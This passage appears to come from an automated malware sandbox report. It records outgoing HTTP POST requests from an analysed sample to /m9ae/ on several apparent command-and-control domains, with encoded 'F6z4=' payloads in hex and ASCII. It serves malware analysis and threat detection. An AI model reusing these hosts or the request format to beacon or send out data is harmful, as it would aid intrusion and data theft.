2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=BsT3oT6oqCQQuReucXDt5RXQZ8~2KA7-ih2bWI2LT16LSxzDA_ueWgtd9qBZOrpseWS6QRObZXfQiFDB70j4qkne0CxHqS9F0JDjWz9a54cCMVWrjyDyfReeJDs8pEpJPUtmEl8WcxMv5H5xWmgbd_VznZ6JHoyauKPLpeGNT-zsliE2iA).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.porggiret.siteConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.porggiret.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.porggiret.site/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 6f 59 56 30 43 61 50 48 57 48 77 35 44 6b 33 35 63 35 46 70 67 38 66 54 31 64 45 52 56 78 35 66 52 49 74 46 54 48 50 32 4d 58 6e 75 69 77 42 49 4e 35 63 4c 34 79 45 71 4d 5f 7e 50 32 73 58 62 78 31 58 45 6f 78 33 4e 50 39 46 62 4b 64 58 77 38 5f 76 44 76 38 54 4f 4b 74 7e 35 6e 42 35 4a 73 63 56 34 6f 36 51 68 62 77 35 51 53 7a 59 59 7a 64 51 57 7a 5f 61 66 41 30 47 51 54 41 6f 36 55 56 49 70 4d 65 4b 5a 38 61 4c 46 54 54 36 41 73 78 37 79 32 6b 33 41 42 7a 77 56 6a 76 46 44 4c 56 28 4f 38 52 36 52 4a 38 42 49 28 37 43 47 4a 63 54 38 4e 61 30 33 75 4b 76 58 62 4a 54 42 31 62 4d 36 75 78 4f 73 50 54 62 78 76 2d 72 39 54 66 64 74 47 45 6d 69 44 61 7a 38 74 6f 4e 42 33 66 28 76 4f 39 4c 6f 39 73 36 4e 7a 38 47 4d 63 4e 51 5f 53 5f 4a 58 32 31 55 59 51 54 43 78 7e 39 58 57 7a 48 51 42 6e 63 6a 53 53 74 46 63 38 72 56 43 67 63 53 73 78 54 71 66 6d 67 72 6a 62 62 77 7a 51 57 72 71 77 77 45 75 61 49 77 59 47 76 6b 5a 45 35 49 39 43 74 4b 61 75 49 41 4c 77 58 73 69 71 56 50 7a 77 31 70 6e 78 33 54 34 4d 44 37 43 41 5f 37 53 35 6e 38 2d 4a 74 4e 4d 4d 78 37 7a 45 5a 43 50 78 73 57 74 35 30 7a 63 52 4d 64 69 59 74 37 41 7e 6a 55 77 67 5a 30 54 7a 79 78 68 34 45 49 41 32 6c 6b 42 57 6f 59 46 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=oYV0CaPHWHw5Dk35c5Fpg8fT1dERVx5fRItFTHP2MXnuiwBIN5cL4yEqM_~P2sXbx1XEox3NP9FbKdXw8_vDv8TOKt~5nB5JscV4o6Qhbw5QSzYYzdQWz_afA0GQTAo6UVIpMeKZ8aLFTT6Asx7y2k3ABzwVjvFDLV(O8R6RJ8BI(7CGJcT8Na03uKvXbJTB1bM6uxOsPTbxv-r9TfdtGEmiDaz8toNB3f(vO9Lo9s6Nz8GMcNQ_S_JX21UYQTCx~9XWzHQBncjSStFc8rVCgcSsxTqfmgrjbbwzQWrqwwEuaIwYGvkZE5I9CtKauIALwXsiqVPzw1pnx3T4MD7CA_7S5n8-JtNMMx7zEZCPxsWt50zcRMdiYt7A~jUwgZ0Tzyxh4EIA2lkBWoYF6Q).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.porggiret.siteConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.porggiret.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.porggiret.site/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 6f 59 56 30 43 61 50 48 57 48 77 35 44 58 66 35 66 4b 39 70 72 63 66 54 39 39 45 58 56 78 35 59 52 49 74 4a 54 47 37 63 4d 6b 58 75 68 6c 39 49 4e 4d 41 4c 28 79 45 72 44 66 7e 44 34 4d 58 30 78 31 58 75 6f 7a 6a 4e 50 39 42 62 4b 66 66 77 39 4f 76 41 75 38 54 32 49 74 7e 32 6a 42 35 59 73 59 31 73 6f 34 55 68 62 7a 4e 51 53 41 63 59 33 62 6b 56 33 66 61 61 4e 6b 47 58 61 67 70 37 55 56 49 4c 4d 65 4b 67 38 65 37 46 53 6a 71 41 74 54 54 78 28 6b 33 42 66 44 78 65 31 74 34 33 47 6e 72 36 70 43 7a 68 51 59 6b 68 39 34 7a 34 57 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=oYV0CaPHWHw5DXf5fK9prcfT99EXVx5YRItJTG7cMkXuhl9INMAL(yErDf~D4MX0x1XuozjNP9BbKffw9OvAu8T2It~2jB5YsY1so4UhbzNQSAcY3bkV3faaNkGXagp7UVILMeKg8e7FSjqAtTTx(k3BfDxe1t43Gnr6pCzhQYkh94z4WA).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.tobewell.storeConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.tobewell.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tobewell.store/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 46 61 6f 46 4f 51 30 67 4a 39 4b 33 36 55 38 6d 50 42 41 6f 35 6f 62 72 78 31 48 48 4a 74 66 36 78 38 4e 71 70 57 67 76 47 33 76 52 37 76 30 35 57 6d 33 67 6a 36 58 42 62 79 39 79 43 39 4a 46 38 79 47 50 63 55 59 61 6a 5f 72 61 70 56 43 57 7a 69 28 76 6b 57 75 65 36 34 75 65 36 4d 30 48 6e 67 73 6f 70 34 77 77 54 46 4d 53 41 72 65 4c 77 37 71 5a 67 4a 46 71 67 70 4d 51 45 68 6e 39 4c 62 66 61 47 6a 43 4f 31 38 37 46 77 4a 6e 2d 28 77 78 58 47 4f 45 64 45 51 61 46 65 47 79 6b 44 67 77 4e 44 36 35 64 4b 64 36 62 73 52 41 6b 6b 4d 61 6e 5a 43 5a 38 79 64 73 33 6e 50 6c 42 5a 38 44 65 47 63 64 35 51 48 53 6a 54 56 50 6f 58 67 4c 75 70 32 66 6d 38 38 39 41 51 6c 33 6b 4d 37 37 55 33 4b 62 68 53 49 68 33 7e 45 61 54 6f 51 77 38 4c 78 49 79 37 48 36 2d 48 32 6e 73 51 7a 28 31 43 5a 28 31 72 38 59 55 66 53 28 6d 50 35 70 50 38 6d 4d 41 39 44 32 4d 37 51 66 6a 6a 47 32 43 53 6c 38 67 6e 63 4e 6f 4d 70 32 39 6c 65 38 67 58 30 33 51 36 78 58 4e 6a 57 58 56 61 36 4d 33 41 4d 68 41 38 30 48 62 4d 58 64 53 33 7a 38 6a 7a 7a 51 76 43 58 38 43 38 58 36 73 77 7a 73 56 57 35 4c 37 46 4e 4f 6c 4f 44 68 52 7a 4d 67 5a 35 48 33 46 53 57 51 75 69 53 36 78 62 70 7a 56 70 4e 46 67 70 48 64 58 32 5a 43 30 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=FaoFOQ0gJ9K36U8mPBAo5obrx1HHJtf6x8NqpWgvG3vR7v05Wm3gj6XBby9yC9JF8yGPcUYaj_rapVCWzi(vkWue64ue6M0Hngsop4wwTFMSAreLw7qZgJFqgpMQEhn9LbfaGjCO187FwJn-(wxXGOEdEQaFeGykDgwND65dKd6bsRAkkManZCZ8yds3nPlBZ8DeGcd5QHSjTVPoXgLup2fm889AQl3kM77U3KbhSIh3~EaToQw8LxIy7H6-H2nsQz(1CZ(1r8YUfS(mP5pP8mMA9D2M7QfjjG2CSl8gncNoMp29le8gX03Q6xXNjWXVa6M3AMhA80HbMXdS3z8jzzQvCX8C8X6swzsVW5L7FNOlODhRzMgZ5H3FSWQuiS6xbpzVpNFgpHdX2ZC0yw).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.tobewell.storeConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.tobewell.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tobewell.store/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 46 61 6f 46 4f 51 30 67 4a 39 4b 33 37 6e 55 6d 4e 33 49 6f 78 49 62 72 39 56 48 46 4a 74 66 35 78 38 4e 75 70 54 59 5f 48 45 50 52 36 37 34 35 57 55 76 67 67 36 58 41 51 53 39 32 4d 64 4a 63 38 79 48 73 63 56 30 61 6a 5f 28 61 70 56 79 57 7a 56 54 73 32 47 75 63 34 34 75 66 74 63 31 4e 6e 67 67 38 70 34 63 77 54 47 30 53 41 38 7e 4c 77 4a 43 61 6e 70 46 72 39 5a 4d 58 4c 42 6e 78 4c 62 65 37 47 6a 43 67 31 2d 7a 46 77 5a 33 2d 7e 53 5a 55 50 4f 45 59 4f 77 62 4f 51 45 6e 42 4c 68 46 46 57 72 51 4b 56 65 58 6c 34 68 73 76 34 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=FaoFOQ0gJ9K37nUmN3IoxIbr9VHFJtf5x8NupTY_HEPR6745WUvgg6XAQS92MdJc8yHscV0aj_(apVyWzVTs2Guc44uftc1Nngg8p4cwTG0SA8~LwJCanpFr9ZMXLBnxLbe7GjCg1-zFwZ3-~SZUPOEYOwbOQEnBLhFFWrQKVeXl4hsv4A).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.new-thinking.digitalConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.new-thinking.digitalUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.new-thinking.digital/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 28 63 75 41 4d 53 38 4d 28 2d 49 4d 62 5f 79 5a 4c 73 6a 31 46 55 49 4b 38 74 32 30 49 4a 6e 53 51 64 62 4d 54 62 36 51 4f 4d 4b 6c 50 48 65 76 35 4e 41 4c 61 36 50 42 59 30 74 38 57 71 6b 61 73 74 39 65 62 69 77 76 5a 54 66 45 63 4f 70 59 33 66 54 64 76 42 38 34 46 53 30 4b 7a 52 71 34 6c 32 7e 6e 68 46 45 51 45 45 4a 4a 4f 38 37 44 51 58 34 71 7a 30 50 39 35 41 6f 5a 55 56 33 5a 62 67 4e 77 36 33 58 4f 36 49 57 2d 6f 49 64 74 39 36 57 62 61 70 49 6e 79 57 30 74 71 45 46 7a 4c 4e 61 73 76 6a 76 76 62 79 61 79 71 35 38 78 36 78 30 6e 35 6a 34 61 32 72 67 78 38 6c 37 5f 55 45 7a 4d 5a 68 68 52 48 63 4a 78 7a 67 77 63 43 61 70 61 4f 37 59 58 43 4c 47 38 35 6f 38 6f 5a 70 66 53 67 79 48 36 36 48 76 32 67 4a 66 71 78 49 64 4c 31 52 5a 62 75 69 4f 35 7e 46 36 5f 64 36 44 45 53 72 39 54 78 32 41 72 63 4a 76 45 34 4f 79 45 42 65 74 42 32 4c 53 78 75 45 6b 66 30 6f 4f 31 54 4f 55 74 6c 5a 45 37 6d 70 39 6c 56 51 70 4a 64 70 46 49 58 53 68 48 49 67 28 36 6c 61 51 69 34 53 52 4f 38 55 64 36 38 63 32 78 33 70 72 47 4f 76 72 71 54 53 38 67 33 72 63 6e 76 31 7e 76 56 64 47 36 64 7a 44 63 7e 4a 45 74 71 55 54 44 56 71 4e 53 4a 74 77 2d 6c 61 44 79 69 76 68 32 67 64 6a 4a 6b 53 35 77 70 66 74 2d 6c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=(cuAMS8M(-IMb_yZLsj1FUIK8t20IJnSQdbMTb6QOMKlPHev5NALa6PBY0t8Wqkast9ebiwvZTfEcOpY3fTdvB84FS0KzRq4l2~nhFEQEEJJO87DQX4qz0P95AoZUV3ZbgNw63XO6IW-oIdt96WbapInyW0tqEFzLNasvjvvbyayq58x6x0n5j4a2rgx8l7_UEzMZhhRHcJxzgwcCapaO7YXCLG85o8oZpfSgyH66Hv2gJfqxIdL1RZbuiO5~F6_d6DESr9Tx2ArcJvE4OyEBetB2LSxuEkf0oO1TOUtlZE7mp9lVQpJdpFIXShHIg(6laQi4SRO8Ud68c2x3prGOvrqTS8g3rcnv1~vVdG6dzDc~JEtqUTDVqNSJtw-laDyivh2gdjJkS5wpft-lQ).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.new-thinking.digitalConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.new-thinking.digitalUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.new-thinking.digital/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 28 63 75 41 4d 53 38 4d 28 2d 49 4d 62 4d 61 5a 4b 39 6a 31 52 6b 49 4b 33 4e 32 32 49 4a 6e 52 51 64 62 49 54 61 28 4c 62 72 75 6c 50 79 79 76 35 37 38 4c 57 61 50 41 51 55 74 34 4a 36 6b 50 73 74 39 34 62 69 4d 76 5a 58 33 45 63 4d 42 59 33 73 37 65 31 42 38 36 44 53 30 4a 33 52 72 69 6c 32 79 7a 68 45 6f 51 45 43 46 4a 50 4e 37 44 42 69 6b 70 67 45 50 38 6c 77 6f 53 65 31 33 64 62 67 4d 52 36 33 58 6b 36 4b 65 2d 72 34 4e 74 38 59 7e 55 4a 4a 49 6d 39 47 31 4e 74 6b 68 32 54 4f 6d 58 6c 57 75 32 48 32 76 45 67 64 74 61 69 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=(cuAMS8M(-IMbMaZK9j1RkIK3N22IJnRQdbITa(LbrulPyyv578LWaPAQUt4J6kPst94biMvZX3EcMBY3s7e1B86DS0J3Rril2yzhEoQECFJPN7DBikpgEP8lwoSe13dbgMR63Xk6Ke-r4Nt8Y~UJJIm9G1Ntkh2TOmXlWu2H2vEgdtaiw).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.ybkos.linkConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.ybkos.linkUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ybkos.link/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 34 5f 6f 38 6b 4b 51 79 39 66 50 72 74 4c 6f 50 44 47 6f 6a 79 52 78 56 28 38 5a 49 51 6c 28 6a 71 42 50 64 43 72 57 34 4d 38 7e 33 68 78 7a 72 50 56 78 31 30 61 4b 65 55 39 55 49 73 6d 6b 74 4a 66 63 50 42 55 30 72 32 52 69 72 42 67 5a 5f 5a 67 4c 70 36 66 31 41 51 41 7e 4e 70 6e 51 64 38 70 48 52 6c 6f 50 4e 4b 6e 78 49 63 5a 48 79 42 31 66 6a 78 56 31 43 6f 30 7a 44 46 55 66 51 58 32 67 7a 6c 30 33 5a 39 4e 42 62 33 65 64 67 4b 63 51 32 4b 4d 46 6c 4a 75 65 73 35 32 74 6e 36 48 28 4f 37 7a 73 64 54 63 6a 51 34 2d 64 46 6d 66 7a 78 74 72 63 6c 61 43 61 4d 79 43 4c 5f 70 70 39 56 42 52 72 46 49 56 6a 30 46 5f 73 76 68 4e 6b 7a 28 5a 4b 49 70 39 32 45 66 5a 35 43 75 38 6d 58 59 54 64 31 46 74 79 4d 34 67 63 48 45 32 50 78 28 48 35 51 6b 38 59 35 79 5f 62 6b 54 73 4e 43 58 72 75 34 56 6a 6e 6a 4e 6e 68 4e 5a 5f 52 78 45 43 54 6e 37 5f 63 66 72 38 31 42 78 69 63 70 79 4c 57 78 31 52 32 34 65 4f 63 2d 7a 4a 37 4b 7e 42 71 70 45 31 6c 7a 36 41 51 44 34 54 6a 79 58 5f 66 41 36 36 58 64 55 36 79 56 70 75 59 54 68 59 5a 50 43 6d 70 61 62 32 59 43 4f 67 53 38 77 33 45 56 64 35 59 44 46 5f 73 47 74 53 75 6b 78 75 73 4f 5a 77 28 4a 76 5a 69 4d 52 56 34 63 67 37 61 64 33 63 67 4f 55 73 54 78 72 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=4_o8kKQy9fPrtLoPDGojyRxV(8ZIQl(jqBPdCrW4M8~3hxzrPVx10aKeU9UIsmktJfcPBU0r2RirBgZ_ZgLp6f1AQA~NpnQd8pHRloPNKnxIcZHyB1fjxV1Co0zDFUfQX2gzl03Z9NBb3edgKcQ2KMFlJues52tn6H(O7zsdTcjQ4-dFmfzxtrclaCaMyCL_pp9VBRrFIVj0F_svhNkz(ZKIp92EfZ5Cu8mXYTd1FtyM4gcHE2Px(H5Qk8Y5y_bkTsNCXru4VjnjNnhNZ_RxECTn7_cfr81BxicpyLWx1R24eOc-zJ7K~BqpE1lz6AQD4TjyX_fA66XdU6yVpuYThYZPCmpab2YCOgS8w3EVd5YDF_sGtSukxusOZw(JvZiMRV4cg7ad3cgOUsTxrg).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.ybkos.linkConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.ybkos.linkUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ybkos.link/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 34 5f 6f 38 6b 4b 51 79 39 66 50 72 74 38 55 50 43 58 6f 6a 36 78 78 56 67 4d 5a 4f 51 6c 28 67 71 42 50 52 43 75 6d 6f 4e 4c 4b 33 68 6c 28 72 49 6e 4a 31 33 61 4b 64 41 74 55 4d 68 47 6b 34 4a 66 63 54 42 56 49 72 32 51 47 72 42 68 4a 5f 5a 52 4c 6f 39 66 31 4f 53 41 7e 4f 37 58 51 55 38 70 72 46 6c 73 48 4e 4b 6b 5a 49 64 6f 48 79 50 44 7a 6b 67 6c 31 35 6b 55 7a 49 50 30 66 63 58 32 67 4e 6c 30 32 43 39 4f 35 62 33 76 74 67 4b 2d 6f 31 41 4d 46 61 4b 75 66 48 6f 46 45 50 78 56 44 5f 36 44 4a 48 44 74 71 54 78 38 59 75 34 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=4_o8kKQy9fPrt8UPCXoj6xxVgMZOQl(gqBPRCumoNLK3hl(rInJ13aKdAtUMhGk4JfcTBVIr2QGrBhJ_ZRLo9f1OSA~O7XQU8prFlsHNKkZIdoHyPDzkgl15kUzIP0fcX2gNl02C9O5b3vtgK-o1AMFaKufHoFEPxVD_6DJHDtqTx8Yu4w).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.bookmygennie.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.bookmygennie.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bookmygennie.com/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 33 6b 46 45 59 4a 55 4b 4b 35 64 4f 47 4b 38 59 76 43 32 6e 4b 42 66 73 31 42 58 6e 39 65 7e 73 77 35 56 6c 7e 59 77 71 33 74 52 2d 59 43 46 75 69 71 75 61 54 70 37 47 4b 74 53 58 41 6e 51 69 44 6e 7a 49 72 70 4a 76 73 30 76 72 4c 2d 34 71 4e 67 6b 30 63 77 72 50 57 33 7e 5a 46 59 65 4b 57 5f 30 58 4c 58 72 71 44 54 59 63 32 77 7e 47 41 31 73 45 55 59 34 61 4b 69 41 33 66 4b 36 59 54 4e 7a 6d 37 34 59 4b 36 4f 36 53 51 62 68 6e 36 32 44 69 34 4a 38 4b 59 78 6f 46 49 65 28 39 53 65 5a 4a 68 4f 46 41 51 71 49 39 56 77 45 79 74 49 42 46 7a 45 73 6e 31 6e 51 6b 6d 43 72 48 43 66 6f 39 59 64 48 54 46 5f 65 65 68 7a 4a 65 77 48 7e 35 4e 78 50 31 63 6c 69 74 41 76 70 47 49 69 79 50 58 37 41 41 79 33 7e 35 59 44 54 52 4d 67 7e 57 6c 46 72 51 5a 41 31 55 68 77 6e 4c 37 6b 4a 68 63 6a 52 36 39 63 31 4d 63 39 77 55 55 48 34 62 6a 4a 52 43 46 39 28 45 57 78 7e 50 74 59 41 6b 28 39 78 64 58 76 38 4b 39 66 28 5f 7a 76 6f 42 4b 47 41 59 56 2d 45 6a 54 76 30 30 4f 42 7a 4f 50 54 65 7a 67 4b 4c 5a 4a 30 67 61 4e 47 33 44 54 61 31 68 31 72 68 69 61 4c 6b 77 53 69 5a 45 41 4e 6e 35 73 4e 46 2d 54 64 56 57 44 30 57 66 4f 57 46 41 6e 5f 44 36 78 62 31 36 63 63 61 73 61 54 30 63 6c 71 4c 31 66 67 37 39 28 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=3kFEYJUKK5dOGK8YvC2nKBfs1BXn9e~sw5Vl~Ywq3tR-YCFuiquaTp7GKtSXAnQiDnzIrpJvs0vrL-4qNgk0cwrPW3~ZFYeKW_0XLXrqDTYc2w~GA1sEUY4aKiA3fK6YTNzm74YK6O6SQbhn62Di4J8KYxoFIe(9SeZJhOFAQqI9VwEytIBFzEsn1nQkmCrHCfo9YdHTF_eehzJewH~5NxP1clitAvpGIiyPX7AAy3~5YDTRMg~WlFrQZA1UhwnL7kJhcjR69c1Mc9wUUH4bjJRCF9(EWx~PtYAk(9xdXv8K9f(_zvoBKGAYV-EjTv00OBzOPTezgKLZJ0gaNG3DTa1h1rhiaLkwSiZEANn5sNF-TdVWD0WfOWFAn_D6xb16ccasaT0clqL1fg79(A).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.bookmygennie.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.bookmygennie.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bookmygennie.com/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 33 6b 46 45 59 4a 55 4b 4b 35 64 4f 47 39 41 59 73 7a 32 6e 41 68 66 73 39 68 58 68 39 65 7e 72 77 35 56 68 7e 5a 45 36 33 63 5a 2d 5a 53 56 75 68 66 43 61 55 70 37 46 53 64 54 51 45 6e 52 34 44 6e 7a 69 72 73 4a 76 73 30 37 72 4c 37 55 71 4e 52 6b 31 64 77 72 42 62 58 7e 61 42 59 65 6c 57 5f 34 44 4c 54 37 71 44 56 63 63 32 6e 69 47 44 6e 45 44 44 49 34 58 46 43 41 38 56 71 36 39 54 4e 79 33 37 34 59 73 36 4d 79 53 52 72 78 6e 34 55 62 68 68 5a 38 4c 53 52 70 6f 46 76 61 46 53 64 64 72 6e 73 6c 41 47 4a 35 5a 56 43 74 48 36 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=3kFEYJUKK5dOG9AYsz2nAhfs9hXh9e~rw5Vh~ZE63cZ-ZSVuhfCaUp7FSdTQEnR4DnzirsJvs07rL7UqNRk1dwrBbX~aBYelW_4DLT7qDVcc2niGDnEDDI4XFCA8Vq69TNy374Ys6MySRrxn4UbhhZ8LSRpoFvaFSddrnslAGJ5ZVCtH6A).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.amspustaka.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.amspustaka.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.amspustaka.com/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 6e 58 52 6a 42 4c 73 2d 57 69 71 50 53 78 4c 46 78 6d 73 52 28 59 6d 35 77 48 50 70 66 42 6a 70 28 66 75 77 47 56 65 55 31 31 69 41 7e 79 4c 5a 72 74 41 77 72 47 75 4c 78 41 59 36 6b 59 38 6f 4e 45 35 65 65 56 56 4a 58 48 69 4b 67 39 39 4c 67 44 42 51 55 56 37 4d 66 57 7a 6e 58 35 52 4a 7a 6b 4d 56 7e 61 76 57 38 7a 67 4b 57 41 52 7a 30 47 6f 30 4d 6a 44 4d 42 41 66 46 72 56 5a 43 72 32 79 72 52 4e 76 43 5a 56 6e 72 54 30 73 6d 37 72 48 5f 78 75 79 62 6f 5f 52 38 76 30 35 42 4f 63 6d 6f 30 49 67 72 7e 75 66 52 55 72 66 55 59 51 6f 4a 74 5f 73 46 72 63 44 71 43 51 64 5a 6f 39 71 52 78 78 75 5a 75 43 56 58 4e 75 57 34 35 75 43 4b 47 47 6c 58 4f 53 56 6c 37 37 79 54 72 65 34 48 44 44 45 47 66 4a 47 6f 57 6b 52 35 53 65 73 65 6d 5a 28 30 50 48 66 4a 64 57 78 5f 71 6b 44 5a 64 36 47 58 44 6b 7a 30 6c 47 53 6a 66 64 44 31 6e 34 4b 45 6e 68 50 65 47 4b 45 30 65 62 30 4c 32 64 37 77 68 6b 44 76 35 58 38 67 7a 4f 58 4c 42 48 75 70 5a 44 7e 6f 31 78 49 49 65 70 42 44 67 4b 77 70 77 74 41 64 48 4e 6f 6a 36 4b 77 70 39 65 61 5a 62 33 31 39 44 6c 73 41 72 4c 68 66 59 35 35 58 4d 64 69 7a 34 70 7a 61 61 44 35 4e 30 74 49 70 48 45 37 4b 4f 50 33 4c 37 71 42 51 71 6e 41 54 4e 65 53 53 7e 47 6e 4e 7a 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=nXRjBLs-WiqPSxLFxmsR(Ym5wHPpfBjp(fuwGVeU11iA~yLZrtAwrGuLxAY6kY8oNE5eeVVJXHiKg99LgDBQUV7MfWznX5RJzkMV~avW8zgKWARz0Go0MjDMBAfFrVZCr2yrRNvCZVnrT0sm7rH_xuybo_R8v05BOcmo0Igr~ufRUrfUYQoJt_sFrcDqCQdZo9qRxxuZuCVXNuW45uCKGGlXOSVl77yTre4HDDEGfJGoWkR5SesemZ(0PHfJdWx_qkDZd6GXDkz0lGSjfdD1n4KEnhPeGKE0eb0L2d7whkDv5X8gzOXLBHupZD~o1xIIepBDgKwpwtAdHNoj6Kwp9eaZb319DlsArLhfY55XMdiz4pzaaD5N0tIpHE7KOP3L7qBQqnATNeSS~GnNzg).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.amspustaka.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.amspustaka.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.amspustaka.com/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 6e 58 52 6a 42 4c 73 2d 57 69 71 50 54 47 58 46 79 52 34 52 30 34 6d 35 39 6e 50 30 66 42 6a 71 28 66 75 30 47 52 47 45 31 43 7e 41 39 6a 58 5a 72 37 30 77 6f 47 75 4b 35 67 5a 39 71 34 39 79 4e 45 35 34 65 51 31 4a 58 48 47 4b 67 38 4e 4c 67 77 70 54 58 56 37 30 5a 57 7a 67 54 35 52 51 7a 6b 51 42 7e 62 44 57 38 33 51 4b 4b 6a 35 7a 33 51 30 37 49 44 44 4a 45 41 66 43 67 31 5a 57 72 32 79 42 52 4e 76 6b 5a 54 72 72 55 45 38 6d 70 5a 76 38 6f 65 7a 52 32 50 52 72 6a 6c 64 49 4d 39 75 70 32 61 78 50 68 39 36 4a 61 4c 4b 75 50 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=nXRjBLs-WiqPTGXFyR4R04m59nP0fBjq(fu0GRGE1C~A9jXZr70woGuK5gZ9q49yNE54eQ1JXHGKg8NLgwpTXV70ZWzgT5RQzkQB~bDW83QKKj5z3Q07IDDJEAfCg1ZWr2yBRNvkZTrrUE8mpZv8oezR2PRrjldIM9up2axPh96JaLKuPw).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.spirituallyzen.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.spirituallyzen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.spirituallyzen.com/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 31 63 30 59 63 2d 4b 61 44 61 49 38 6f 33 4b 47 76 33 6a 69 36 53 55 58 67 39 65 54 42 44 4e 6e 69 39 64 5f 58 68 66 63 6f 44 72 48 62 66 32 6a 32 7a 4a 35 46 71 4d 62 36 43 70 73 41 32 52 51 52 48 33 53 63 43 31 38 70 78 61 50 4a 58 55 68 54 59 5a 6c 58 